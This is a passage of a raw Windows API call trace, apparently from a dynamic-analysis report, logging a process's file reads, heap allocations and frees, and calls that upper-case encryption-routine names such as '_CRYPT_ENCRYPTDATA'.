lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.405] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.468] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.471] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.473] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.475] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0201.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0201.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf62020 [0201.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0201.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0201.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0201.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0201.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0201.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0201.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0201.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5e020 [0201.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf62020 | out: hHeap=0x970000) returned 1 [0201.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0201.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0201.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0201.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf62020 [0201.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf62020 | out: hHeap=0x970000) returned 1 [0201.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0201.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0201.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0201.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0201.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0201.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0201.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0201.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0201.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0201.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0201.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0201.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0201.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0201.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0201.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0201.727] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0201.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0201.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0201.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0201.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0201.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0201.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0201.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0201.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0201.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf67020 [0201.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0201.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0201.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0201.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0201.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x107c020 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0201.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0201.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0201.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0201.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0201.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0201.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0201.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0201.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0201.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0201.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0201.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0201.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0201.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0201.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0201.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0201.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0201.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0201.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0201.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0201.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0201.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0201.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0201.786] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0201.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0201.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0201.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0201.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0201.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0201.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0201.786] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0201.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0201.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0201.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0201.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0201.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0201.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0201.787] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0201.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0201.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0201.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0201.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0201.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0201.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0201.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0201.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0201.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0201.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0201.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0201.789] RtlAllocateHeap 